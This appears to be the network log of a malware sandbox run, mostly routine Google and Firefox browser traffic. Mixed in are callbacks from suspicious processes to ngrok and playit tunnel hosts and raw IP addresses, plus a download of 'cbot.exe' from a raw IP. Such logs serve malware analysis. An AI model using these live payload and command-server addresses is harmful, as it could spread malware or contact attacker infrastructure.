POST https://region1.google-analytics.com/g/collect?v=2&tid=G-FWCBRW1RY8&gtm=45je5190v886057375z8595350za200zb595350&_p=1736791373704&gcs=G101&gcd=13q3r3l3l5l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&ul=en&cid=1332354461.1736791375&sr=1280x720&_ng=1&ir=1&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B123.0.6312.123%7CNot%253AA-Brand%3B8.0.0.0%7CChromium%3B123.0.6312.123&uamb=0&uam=&uap=Windows&uapv=14.0.0&uaw=0&frm=0&pscdl=denied&_eu=EA&_s=2&dl=https%3A%2F%2Fworkspacegoogle.com%2Fus%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&dp=us%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&sid=1736791374&sct=1&seg=0&dt=Google%20Drive%3A%20Share%20Files%20Online%20with%20Secure%20Cloud%20Storage%20%7C%20Google%20Workspace&en=auto_track_event&_c=1&ep.region=noram&ep.original_url=workspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&ep.cs_employee_count=&ep.concatenated_exids=(not%20set)&ep.apps_marketing_signals_cookie=source%3D%26lastExperiment%3D%26allExperiments%3D&ep.cs_industry=&ep.cs_formid=33&ep.locale=en_us&ep.resolution=1280x672&ep.is_rivendell=true&ep.is_eea=false&ep.event_category=drive%3A%20global%20nav&ep.event_action=sign%20in&ep.event_label=https%3A%2F%2Fdrive.google.com%2Fdrive%2F%3Fdmr%3D1%26ec%3Dwgc-drive-globalnav-goto&ep.data_g_metadata=na&_et=1476&tfd=3359
142.250.178.14:443

https://apis.google.com/_/scs/abc-static/_/js/k=gapi.lb.en.5oZHy0SiJxw.O/m=client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo-Hry6DG-RE4t9kNz_t6hiwmwXOmA/cb=gapi.loaded_0?le=scs

tls, http2

chrome.exe

4.6kB
127.8kB
63
105

HTTP Request

GET https://apis.google.com/js/client.js

HTTP Request

GET https://apis.google.com/_/scs/abc-static/_/js/k=gapi.lb.en.5oZHy0SiJxw.O/m=client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo-Hry6DG-RE4t9kNz_t6hiwmwXOmA/cb=gapi.loaded_0?le=scs
142.250.200.10:443

https://youtube.googleapis.com/iframe_api

tls, http2

chrome.exe

7.8kB
17.7kB
38
52

HTTP Request

GET https://feedback-pa.clients6.google.com/static/proxy.html?usegapi=1&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%2Fk%3Dgapi.lb.en.5oZHy0SiJxw.O%2Fd%3D1%2Frs%3DAHpOoo-Hry6DG-RE4t9kNz_t6hiwmwXOmA%2Fm%3D__features__

HTTP Request

POST https://feedback-pa.clients6.google.com/v1/survey/startup_config?key=AIzaSyCB6OnnfuitFnaYWu4BvtGKaoLFk4cm-GE

HTTP Request

POST https://feedback-pa.clients6.google.com/v1/survey/trigger/trigger_anonymous?key=AIzaSyD3LJeW4Q6gtdgJlyeFZUp-GhpIoc6EUeg

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

POST https://people-pa.clients6.google.com/batch?%24ct=multipart%2Fmixed%3B%20boundary%3D%22%3D%3D%3D%3D%3Dkjbcmgb8d2wd%3D%3D%3D%3D%3D%22&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

HTTP Request

GET https://youtube.googleapis.com/iframe_api
216.58.204.66:443

ade.googlesyndication.com

tls, http2

chrome.exe

1.1kB
6.8kB
10
9
216.58.204.66:443

https://ade.googlesyndication.com/ddm/activity/src=2507573;dc_pre=CI3T9Iik84oDFXUiBgAdprIO1A;type=googl003;cat=fl-gw008;ord=1;num=1640181783109;npa=0;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B123.0.6312.123%7CNot%253AA-Brand%3B8.0.0.0%7CChromium%3B123.0.6312.123;uamb=0;uam=;uap=Windows;uapv=14.0.0;uaw=0;pscdl=denied;frm=0;gtm=45fe5190v9181638614z8595350za201zb595350;gcs=G101;gcd=13q3r3l3l5l1;dma=0;tag_exp=101925629~102067555~102067808~102081485~102198178;epver=2;~oref=https%3A%2F%2Fworkspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F?

tls, http2

chrome.exe

2.9kB
7.3kB
18
19

HTTP Request

GET https://ade.googlesyndication.com/ddm/activity/src=2507573;type=googl003;cat=fl-gw008;ord=1;num=1640181783109;npa=0;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B123.0.6312.123%7CNot%253AA-Brand%3B8.0.0.0%7CChromium%3B123.0.6312.123;uamb=0;uam=;uap=Windows;uapv=14.0.0;uaw=0;pscdl=denied;frm=0;gtm=45fe5190v9181638614z8595350za201zb595350;gcs=G101;gcd=13q3r3l3l5l1;dma=0;tag_exp=101925629~102067555~102067808~102081485~102198178;epver=2;~oref=https%3A%2F%2Fworkspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F?

HTTP Request

GET https://ade.googlesyndication.com/ddm/activity/src=2507573;dc_pre=CI3T9Iik84oDFXUiBgAdprIO1A;type=googl003;cat=fl-gw008;ord=1;num=1640181783109;npa=0;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B123.0.6312.123%7CNot%253AA-Brand%3B8.0.0.0%7CChromium%3B123.0.6312.123;uamb=0;uam=;uap=Windows;uapv=14.0.0;uaw=0;pscdl=denied;frm=0;gtm=45fe5190v9181638614z8595350za201zb595350;gcs=G101;gcd=13q3r3l3l5l1;dma=0;tag_exp=101925629~102067555~102067808~102081485~102198178;epver=2;~oref=https%3A%2F%2Fworkspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F?
142.250.178.14:443

https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1973855854&timestamp=1736791377283

tls, http2

chrome.exe

2.7kB
24.7kB
24
26

HTTP Request

GET https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1973855854&timestamp=1736791377283
142.250.179.238:443

https://play.google.com/log?format=json&hasfast=true&authuser=0

tls, http2

chrome.exe

2.3kB
8.7kB
19
20

HTTP Request

OPTIONS https://play.google.com/log?format=json&hasfast=true&authuser=0

HTTP Request

OPTIONS https://play.google.com/log?format=json&hasfast=true&authuser=0

HTTP Request

OPTIONS https://play.google.com/log?format=json&hasfast=true&authuser=0
142.250.179.238:443

play.google.com

tls, http2

chrome.exe

1.0kB
7.6kB
9
9
13.127.206.16:14296

0.tcp.in.ngrok.io

Client-base.exe

260 B
200 B
5
5
142.250.178.14:443

https://accounts.youtube.com/accounts/SetSID?ssdc=1&sidt=ALWU2cs7dDP0k5dv7R8/Z%2BaSX7vPT0gHU9yxrJop3NaiA/5O/sguDsNANAtmmSu0CZefG8%2BReZ3xrImRnV5saegxdqMgBqhkn/ljf7QabKTYCk2c0DRfXbmPFqleaZd6xZ90D%2BZ4WMiTUVZMm9SzhEyDMhsD%2BnNWW1e5VTlZ6QvqNr1pGTiBPqonwtyS2qGDf8C2IUzPDxPvMLODK/2eSy6nGzH5n1dQ74R4ppLJI/LdSsJWlSfQaH9VbBNL2mlRXzWKGMHK2kNtUksl3k8WvMfAReSLSWV2B6DmuEZNo7ifpmrg3V/ao3Q0%2B3%2B26GeYfq8S9naupRe98pJgUSkH6DTpJuLQ1a5O2l8y2JHbhYZCbjxiAz3iDbE4kc4JuQqAWEPP3vdd/0xTWl/vO3obN0lK1bdbmuXjsmGCtx1gvh%2BOm77NKTeIxWP8bi2ZXdWN6qf39hFg7riuay7svjuYdnOFHmaFyUIzDQwf6auiFYNF%2B4Hi/p0%2BZPCNLhg90ej8xJohst7oRYY3kQ1yQEFecbLGDfXt8tZ35hK7/q16MFUZurougxAjpPIudOK2dSrauP/DijGmXNToMGIpwVwrO5trkqOGG0G6HlZ8IpFHM9Lcutk169Ztetr0ZfR1CRTk7CyayQH8LGlHhf8sN5CKLxrIbFoj7PX/jnw2wPNb90En59MZDYtR%2B11n1cPPF3HIDAJOB2kbzITkWnH9OJ97e3YkUt92898V3HAwC73zcFhC0tg%2B1ISBG4P1W34xucU2aCWReGIN6LT2&continue=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-globalnav-goto%26authuser%3D0&tcc=1&dbus=GB&ifkv=AVdkyDkNQHt5jt7m9AquP6nC9dKMQfX7bt7WfwnMjLSiu4Efi2FOQiuOeoLKB4ek04vhvhquhDSp

tls, http2

chrome.exe

3.0kB
12.3kB
16
18

HTTP Request

GET https://accounts.youtube.com/accounts/SetSID?ssdc=1&sidt=ALWU2cs7dDP0k5dv7R8/Z%2BaSX7vPT0gHU9yxrJop3NaiA/5O/sguDsNANAtmmSu0CZefG8%2BReZ3xrImRnV5saegxdqMgBqhkn/ljf7QabKTYCk2c0DRfXbmPFqleaZd6xZ90D%2BZ4WMiTUVZMm9SzhEyDMhsD%2BnNWW1e5VTlZ6QvqNr1pGTiBPqonwtyS2qGDf8C2IUzPDxPvMLODK/2eSy6nGzH5n1dQ74R4ppLJI/LdSsJWlSfQaH9VbBNL2mlRXzWKGMHK2kNtUksl3k8WvMfAReSLSWV2B6DmuEZNo7ifpmrg3V/ao3Q0%2B3%2B26GeYfq8S9naupRe98pJgUSkH6DTpJuLQ1a5O2l8y2JHbhYZCbjxiAz3iDbE4kc4JuQqAWEPP3vdd/0xTWl/vO3obN0lK1bdbmuXjsmGCtx1gvh%2BOm77NKTeIxWP8bi2ZXdWN6qf39hFg7riuay7svjuYdnOFHmaFyUIzDQwf6auiFYNF%2B4Hi/p0%2BZPCNLhg90ej8xJohst7oRYY3kQ1yQEFecbLGDfXt8tZ35hK7/q16MFUZurougxAjpPIudOK2dSrauP/DijGmXNToMGIpwVwrO5trkqOGG0G6HlZ8IpFHM9Lcutk169Ztetr0ZfR1CRTk7CyayQH8LGlHhf8sN5CKLxrIbFoj7PX/jnw2wPNb90En59MZDYtR%2B11n1cPPF3HIDAJOB2kbzITkWnH9OJ97e3YkUt92898V3HAwC73zcFhC0tg%2B1ISBG4P1W34xucU2aCWReGIN6LT2&continue=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-globalnav-goto%26authuser%3D0&tcc=1&dbus=GB&ifkv=AVdkyDkNQHt5jt7m9AquP6nC9dKMQfX7bt7WfwnMjLSiu4Efi2FOQiuOeoLKB4ek04vhvhquhDSp
66.102.1.94:443

https://accounts.google.co.uk/accounts/SetSID?ssdc=1&sidt=ALWU2cvZPQ43gbjEgp8YVrorWh1otPuZJAUVYsME4eQ19w/AjYNetXPUp3RHap6xxu8vRLyfusYkVDJLSPaCp7TdqLt0N9nZADr0yD2/%2BsRUorzSyEYo3sd5unWFnklQzSmWZtQe8y5zBKK5SzyOSXetg3Gh1Xx55GKD4m6i4db87oBChwJLca%2BQUBHr2jqeiBJZJ%2BhKx%2BlaIoYSwoVqWhUdp%2BJS2NZLwmIstZC0IM0vrxeRJ783KbTNU9YFQ9TeZl6JWFijT9byj9L/GGt39CpCZxHlAWmwtIagO9ydboELc5jxgPyLINjEoNzDwYdYSWLdvluyma6MXE3bg4Jrp7QZr3j/qBV%2BOXEXZ7s1TDJJImH1Tif82jCjFm020lZRTMsZdc4%2BwkBxP/Lo6vyNXrfcecnHSMyz%2BtdtMYahCK4qiWhAoR2RVgfAX5TgtMo19g2Qnyq8RgVdNsmJwO13Ge5lytoOwbPvVZ7oEnaQC9M//MPIf6DvjS8ipIwFFZsaKiqoleYchSmdqf%2BJmpgiOwzv%2BcWw5sceWECM6kZ8sL0dcDVK%2Bw3AOgrDjCv1UDCmHEMijCBjDMnXRoJVnv9Xz9gi%2BFsB/nZO4tKF9GEUGQZnBuzCifqX3sIr309GCXofLfVoHkTyledX2NdbLQcASyhR5odjwoG/JFJfW6xrdZU9t20VRDiheXN1tmHmHKjJetV01yyNjoyKStn3M1lH%2BHSQwHFdWeKF4yHIT%2B%2BDekNTeumkFjAA3AdcM6ZT3ZSgQCPNNswP9cfE&continue=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-globalnav-goto%26authuser%3D0&tcc=1&ifkv=AVdkyDl6QEi-7GmqewIYykOVU29laUbFgCNje1lR-WSQdni8x_tdYZ4Ey87xvJABqG-wI9ILrZBH

tls, http2

chrome.exe

3.0kB
9.0kB
16
16

HTTP Request

GET https://accounts.google.co.uk/accounts/SetSID?ssdc=1&sidt=ALWU2cvZPQ43gbjEgp8YVrorWh1otPuZJAUVYsME4eQ19w/AjYNetXPUp3RHap6xxu8vRLyfusYkVDJLSPaCp7TdqLt0N9nZADr0yD2/%2BsRUorzSyEYo3sd5unWFnklQzSmWZtQe8y5zBKK5SzyOSXetg3Gh1Xx55GKD4m6i4db87oBChwJLca%2BQUBHr2jqeiBJZJ%2BhKx%2BlaIoYSwoVqWhUdp%2BJS2NZLwmIstZC0IM0vrxeRJ783KbTNU9YFQ9TeZl6JWFijT9byj9L/GGt39CpCZxHlAWmwtIagO9ydboELc5jxgPyLINjEoNzDwYdYSWLdvluyma6MXE3bg4Jrp7QZr3j/qBV%2BOXEXZ7s1TDJJImH1Tif82jCjFm020lZRTMsZdc4%2BwkBxP/Lo6vyNXrfcecnHSMyz%2BtdtMYahCK4qiWhAoR2RVgfAX5TgtMo19g2Qnyq8RgVdNsmJwO13Ge5lytoOwbPvVZ7oEnaQC9M//MPIf6DvjS8ipIwFFZsaKiqoleYchSmdqf%2BJmpgiOwzv%2BcWw5sceWECM6kZ8sL0dcDVK%2Bw3AOgrDjCv1UDCmHEMijCBjDMnXRoJVnv9Xz9gi%2BFsB/nZO4tKF9GEUGQZnBuzCifqX3sIr309GCXofLfVoHkTyledX2NdbLQcASyhR5odjwoG/JFJfW6xrdZU9t20VRDiheXN1tmHmHKjJetV01yyNjoyKStn3M1lH%2BHSQwHFdWeKF4yHIT%2B%2BDekNTeumkFjAA3AdcM6ZT3ZSgQCPNNswP9cfE&continue=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-globalnav-goto%26authuser%3D0&tcc=1&ifkv=AVdkyDl6QEi-7GmqewIYykOVU29laUbFgCNje1lR-WSQdni8x_tdYZ4Ey87xvJABqG-wI9ILrZBH
13.127.206.16:14296

0.tcp.in.ngrok.io

Client-base.exe

260 B
200 B
5
5
142.250.200.3:443

https://ssl.gstatic.com/docs/common/cleardot.gif?zx=r5jbjylw9np3

tls, http2

chrome.exe

2.2kB
8.2kB
17
19

HTTP Request

GET https://ssl.gstatic.com/images/branding/product/1x/drive_2020q4_48dp.png

HTTP Request

GET https://ssl.gstatic.com/docs/common/cleardot.gif?zx=r5jbjylw9np3
216.58.212.238:443

https://lh3.google.com/u/0/ogw/AF2bZyj0W6ZVtN8KyX5zrkx3xUynQy35o_-yt2-kzNE_9KURxA=s32-c-mo

tls, http2

chrome.exe

3.6kB
11.6kB
17
18

HTTP Request

GET https://lh3.google.com/u/0/ogw/AF2bZyj0W6ZVtN8KyX5zrkx3xUynQy35o_-yt2-kzNE_9KURxA=s32-c-mo
142.250.187.238:443

https://clients6.google.com/drive/v2internal/changes/startPageToken?openDrive=false&reason=1423&syncType=0&errorRecovery=false&dsNonce=ep5yu34wnxpd&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

tls, http2

chrome.exe

3.3kB
9.6kB
21
26

HTTP Request

OPTIONS https://clients6.google.com/drive/v2internal/apps?openDrive=true&reason=301&syncType=0&errorRecovery=false&fields=kind%2CdefaultAppIds%2Citems(kind%2Cid%2CuseByDefault%2Cname%2CopenUrlTemplate%2CprimaryMimeTypes%2CsecondaryMimeTypes%2CcreateUrl%2CcreateInFolderTemplate%2CobjectType%2CsupportsCreate%2CsupportsImport%2CsupportsMultiOpen%2CsupportsOfflineCreate%2Cinstalled%2Cauthorized%2CproductUrl%2CprimaryFileExtensions%2CsecondaryFileExtensions%2CshortDescription%2ClongDescription%2CproductId%2Cremovable%2Cicons(iconUrl%2Csize%2Ccategory)%2Ctype%2CchromeExtensionIds%2CrequiresAuthorizationBeforeOpenWith%2ChasDriveWideScope%2CdriveBranded%2CdriveSource%2CsupportsMobileBrowser%2CsupportsTeamDrives%2ChasGsmListing)&languageCode=en&retryCount=0&dsNonce=k0wcqv9rai0s&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

HTTP Request

OPTIONS https://clients6.google.com/drive/v2beta/apps?openDrive=true&reason=700&syncType=0&errorRecovery=false&fields=items(icons%5Bcategory%3D%27application%27%5D%2Cicons(size%2CiconUrl)%2Cid%2Cname%2CopenUrlTemplate%2CprimaryFileExtensions%2CprimaryMimeTypes%2CproductId%2CrankingInfo%2CsecondaryFileExtensions%2CsecondaryMimeTypes%2Ckind)%2Ckind&appQueryScope=all_webstore&languageCode=en&retryCount=0&key=AIzaSyBc1bLOZpOtg3-qgMjSQ6pmn6HbE2zjzJg

HTTP Request

OPTIONS https://clients6.google.com/drive/v2internal/changes/startPageToken?openDrive=false&reason=1423&syncType=0&errorRecovery=false&dsNonce=ep5yu34wnxpd&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8
216.58.201.106:443

https://ogads-pa.clients6.google.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData

tls, http2

chrome.exe

1.9kB
12.1kB
16
18

HTTP Request

OPTIONS https://ogads-pa.clients6.google.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData
142.250.187.202:443

https://waa-pa.clients6.google.com/$rpc/google.internal.waa.v1.Waa/Ping

tls, http2

chrome.exe

2.2kB
12.4kB
19
24

HTTP Request

OPTIONS https://waa-pa.clients6.google.com/$rpc/google.internal.waa.v1.Waa/Create

HTTP Request

OPTIONS https://waa-pa.clients6.google.com/$rpc/google.internal.waa.v1.Waa/Ping
45.93.20.67:80

._cache_New Text Document mod.exe

260 B
5
142.250.187.234:443

https://appsgrowthpromo-pa.clients6.google.com/v1/promotion/FetchRecommendation?key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8&alt=protojson

tls, http2

chrome.exe

2.0kB
12.1kB
16
19

HTTP Request

OPTIONS https://appsgrowthpromo-pa.clients6.google.com/v1/promotion/FetchRecommendation?key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8&alt=protojson
142.250.179.238:443

https://docs.google.com/offline/iframeapi?ouid=ubc4833a351b819&sa=9

tls, http2

chrome.exe

3.8kB
9.4kB
17
17

HTTP Request

GET https://docs.google.com/offline/iframeapi?ouid=ubc4833a351b819&sa=9
142.250.178.14:443

https://contacts.google.com/widget/hovercard/v/2?origin=https%3A%2F%2Fdrive.google.com&usegapi=1&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%2Fk%3Dgapi.gapi.en.l2ZUC8FxqV8.O%2Fd%3D1%2Frs%3DAHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ%2Fm%3D__features__

tls, http2

chrome.exe

4.0kB
20.3kB
19
22

HTTP Request

GET https://contacts.google.com/widget/hovercard/v/2?origin=https%3A%2F%2Fdrive.google.com&usegapi=1&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%2Fk%3Dgapi.gapi.en.l2ZUC8FxqV8.O%2Fd%3D1%2Frs%3DAHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ%2Fm%3D__features__
142.250.178.14:443

https://ogs.google.com/u/0/widget/app?awwd=1&origin=https%3A%2F%2Fdrive.google.com&cn=app&pid=49&spid=49&hl=en

tls, http2

chrome.exe

4.0kB
27.9kB
22
30

HTTP Request

GET https://ogs.google.com/u/0/widget/app?awwd=1&origin=https%3A%2F%2Fdrive.google.com&cn=app&pid=49&spid=49&hl=en
142.250.178.10:443

https://signaler-pa.clients6.google.com/punctual/v1/chooseServer?key=AIzaSyAWGrfCCr7albM3lmCc937gx4uIphbpeKQ

tls, http2

chrome.exe

1.9kB
12.0kB
16
18

HTTP Request

OPTIONS https://signaler-pa.clients6.google.com/punctual/v1/chooseServer?key=AIzaSyAWGrfCCr7albM3lmCc937gx4uIphbpeKQ
45.93.20.67:80

._cache_Synaptics.exe

260 B
5
13.127.206.16:14296

0.tcp.in.ngrok.io

Client-base.exe

260 B
200 B
5
5
31.41.244.11:80

._cache_New Text Document mod.exe

260 B
5
147.185.221.25:11758

other-little.gl.at.ply.gg

DirectX111.exe

260 B
5
13.127.206.16:14296

0.tcp.in.ngrok.io

Client-base.exe

260 B
200 B
5
5
3.108.97.190:14296

0.tcp.in.ngrok.io

Client-base.exe

260 B
200 B
5
5
142.250.179.238:443

docs.google.com

tls

Synaptics.exe

2.0kB
11.8kB
18
16
142.250.178.3:80

http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCtrC6LRgin8QlSmIIYAEvj

http

Synaptics.exe

828 B
1.6kB
8
5

HTTP Request

GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDREXAZkIcRFgn9FoWvtnQ0

HTTP Response

200

HTTP Request

GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCtrC6LRgin8QlSmIIYAEvj

HTTP Response

200
216.58.212.193:443

drive.usercontent.google.com

tls

Synaptics.exe

2.5kB
15.0kB
24
22
45.93.20.67:80

._cache_New Text Document mod.exe

260 B
5
3.108.97.190:14296

0.tcp.in.ngrok.io

Client-base.exe

260 B
200 B
5
5
151.101.2.49:443

https://urlhaus.abuse.ch/downloads/text_online/

tls, http

._cache_New Text Document mod.exe

11.8kB
661.2kB
249
485

HTTP Request

GET https://urlhaus.abuse.ch/downloads/text_online/

HTTP Response

200
106.53.83.169:80

._cache_New Text Document mod.exe

260 B
5
45.93.20.67:80

._cache_Synaptics.exe

260 B
5
31.41.244.11:80

._cache_New Text Document mod.exe

260 B
5
151.101.2.49:443

https://urlhaus.abuse.ch/downloads/text_online/

tls, http

._cache_New Text Document mod.exe

11.6kB
661.8kB
245
483

HTTP Request

GET https://urlhaus.abuse.ch/downloads/text_online/

HTTP Response

200
185.215.113.16:80

._cache_New Text Document mod.exe

260 B
5
3.108.97.190:14296

0.tcp.in.ngrok.io

Client-base.exe

260 B
200 B
5
5
142.250.179.163:443

https://beacons.gcp.gvt2.com/domainreliability/upload

tls, http2

chrome.exe

2.9kB
6.5kB
17
14

HTTP Request

POST https://beacons.gcp.gvt2.com/domainreliability/upload
147.185.221.25:11758

other-little.gl.at.ply.gg

DirectX111.exe

260 B
5
3.108.97.190:14296

0.tcp.in.ngrok.io

Client-base.exe

260 B
200 B
5
5
45.93.20.67:80

._cache_New Text Document mod.exe

260 B
5
3.108.97.190:14296

0.tcp.in.ngrok.io

Client-base.exe

260 B
200 B
5
5
185.215.113.16:80

._cache_New Text Document mod.exe

260 B
5
103.24.179.18:7004

._cache_Synaptics.exe

260 B
5
45.93.20.67:80

._cache_New Text Document mod.exe

260 B
5
3.108.97.190:14296

0.tcp.in.ngrok.io

Client-base.exe

260 B
200 B
5
5
185.215.113.16:80

._cache_New Text Document mod.exe

260 B
5
142.250.180.14:443

https://google.com/domainreliability/upload

tls, http2

chrome.exe

2.5kB
9.1kB
16
17

HTTP Request

POST https://google.com/domainreliability/upload
142.251.173.84:443

accounts.google.com

tls, http2

chrome.exe

1.1kB
5.6kB
9
8
35.206.35.210:443

https://e2c48.gcp.gvt2.com/nel/

tls, http2

chrome.exe

1.9kB
5.5kB
15
13

HTTP Request

POST https://e2c48.gcp.gvt2.com/nel/

HTTP Response

204
142.250.179.163:443

https://beacons.gvt2.com/domainreliability/upload

tls, http2

chrome.exe

2.1kB
6.6kB
17
15

HTTP Request

POST https://beacons.gvt2.com/domainreliability/upload
3.108.97.190:14296

0.tcp.in.ngrok.io

Client-base.exe

260 B
200 B
5
5
147.185.221.25:11758

other-little.gl.at.ply.gg

DirectX111.exe

260 B
5
142.250.179.163:443

https://beacons.gcp.gvt2.com/domainreliability/upload

tls, http2

chrome.exe

2.1kB
6.6kB
16
16

HTTP Request

POST https://beacons.gcp.gvt2.com/domainreliability/upload
172.217.169.3:443

https://google.co.uk/domainreliability/upload

tls, http2

chrome.exe

2.0kB
6.6kB
16
16

HTTP Request

POST https://google.co.uk/domainreliability/upload
35.215.235.162:443

https://e2c46.gcp.gvt2.com/nel/

tls, http2

chrome.exe

2.0kB
5.5kB
15
14

HTTP Request

POST https://e2c46.gcp.gvt2.com/nel/

HTTP Response

204
34.80.89.126:443

https://e2c1.gcp.gvt2.com/nel/

tls, http2

chrome.exe

1.9kB
5.5kB
15
13

HTTP Request

POST https://e2c1.gcp.gvt2.com/nel/

HTTP Response

204
34.80.89.126:443

e2c1.gcp.gvt2.com

tls, http2

chrome.exe

1.1kB
5.2kB
10
9
3.108.97.190:14296

0.tcp.in.ngrok.io

Client-base.exe

260 B
200 B
5
5
172.217.169.78:443

drive.google.com

tls, http2

chrome.exe

999 B
8.1kB
9
9
31.41.244.11:80

._cache_New Text Document mod.exe

260 B
5
185.215.113.16:80

._cache_New Text Document mod.exe

260 B
5
106.75.62.120:8000

._cache_Synaptics.exe

260 B
5
45.93.20.67:80

._cache_New Text Document mod.exe

260 B
5
3.108.97.190:14296

0.tcp.in.ngrok.io

Client-base.exe

260 B
200 B
5
5
45.93.20.67:80

._cache_New Text Document mod.exe

260 B
5
151.101.130.49:443

https://urlhaus.abuse.ch/downloads/text_online/

tls, http

._cache_New Text Document mod.exe

11.6kB
661.2kB
245
483

HTTP Request

GET https://urlhaus.abuse.ch/downloads/text_online/

HTTP Response

200
106.53.83.169:80

._cache_New Text Document mod.exe

260 B
5
3.108.97.190:14296

0.tcp.in.ngrok.io

Client-base.exe

260 B
200 B
5
5
142.250.178.10:443

signaler-pa.clients6.google.com

tls, http2

chrome.exe

1.1kB
11.3kB
11
13
13.127.206.16:14296

0.tcp.in.ngrok.io

Client-base.exe

260 B
200 B
5
5
147.185.221.25:11758

other-little.gl.at.ply.gg

DirectX111.exe

260 B
5
154.213.192.42:80

http://154.213.192.42/cbot.exe

http

._cache_New Text Document mod.exe

1.0kB
25.8kB
21
22

HTTP Request

GET http://154.213.192.42/cbot.exe

HTTP Response

200
185.215.113.66:80

._cache_New Text Document mod.exe

260 B
5
154.213.192.42:3778

cbot.exe

794 B
652 B
17
16
13.127.206.16:14296

0.tcp.in.ngrok.io

Client-base.exe

260 B
200 B
5
5
31.41.244.11:80

._cache_New Text Document mod.exe

260 B
5
121.40.19.66:7000

._cache_Synaptics.exe

260 B
5
45.93.20.67:80

._cache_New Text Document mod.exe

260 B
5
127.0.0.1:52057

firefox.exe
45.93.20.67:80

._cache_New Text Document mod.exe

260 B
5
13.127.206.16:14296

0.tcp.in.ngrok.io

Client-base.exe

260 B
200 B
5
5
34.149.97.1:443

https://firefox-api-proxy.cdn.mozilla.net/desktop/v1/recommendations?locale=en-US&region=GB&count=30

tls, http2

firefox.exe

1.9kB
13.3kB
14
19

HTTP Request

GET https://firefox-api-proxy.cdn.mozilla.net/desktop/v1/recommendations?locale=en-US&region=GB&count=30
185.215.113.16:80

._cache_New Text Document mod.exe

260 B
5
34.117.121.53:443

https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftl

tls, http2

firefox.exe

1.6kB
21.2kB
16
25

HTTP Request

GET https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftl
127.0.0.1:52078

firefox.exe
172.217.169.78:443

https://drive.google.com/

tls, http2

firefox.exe

2.1kB
9.7kB
16
21

HTTP Request

GET https://drive.google.com/
142.251.173.84:443

https://accounts.google.com/ServiceLogin?service=wise&passive=1209600&osid=1&continue=https://drive.google.com/&followup=https://drive.google.com/&emr=1

tls, http2

firefox.exe

2.3kB
6.8kB
15
19

HTTP Request

GET https://accounts.google.com/ServiceLogin?service=wise&passive=1209600&osid=1&continue=https://drive.google.com/&followup=https://drive.google.com/&emr=1
142.250.187.196:443

https://www.google.com/intl/en-US/drive/

tls, http2

firefox.exe

2.2kB
6.1kB
15
18

HTTP Request

GET https://www.google.com/intl/en-US/drive/
142.250.200.46:443

https://workspace.google.com/assets/b59f5798.min.js

tls, http2

firefox.exe

5.5kB
123.4kB
54
111

HTTP Request

GET https://workspace.google.com/intl/en-US/products/drive/

HTTP Request

GET https://workspace.google.com/assets/0d962dee.css

HTTP Request

GET https://workspace.google.com/assets/426a67ed.css

HTTP Request

GET https://workspace.google.com/assets/2bbaf8c6.css

HTTP Request

GET https://workspace.google.com/assets/426a67ed2.css

HTTP Request

GET https://workspace.google.com/assets/f261be23.css

HTTP Request

GET https://workspace.google.com/assets/f1b5e532.min.js

HTTP Request

GET https://workspace.google.com/assets/80078c6d.min.js

HTTP Request

GET https://workspace.google.com/assets/a9e19642.min.js

HTTP Request

GET https://workspace.google.com/assets/c64600aa.min.js

HTTP Request

GET https://workspace.google.com/assets/cd9c842e.min.js

HTTP Request

GET https://workspace.google.com/assets/00adf923.min.js

HTTP Request

GET https://workspace.google.com/assets/5e53e9e0.min.js

HTTP Request

GET https://workspace.google.com/assets/7a4d51ed.min.js

HTTP Request

GET https://workspace.google.com/assets/197ab810.min.js

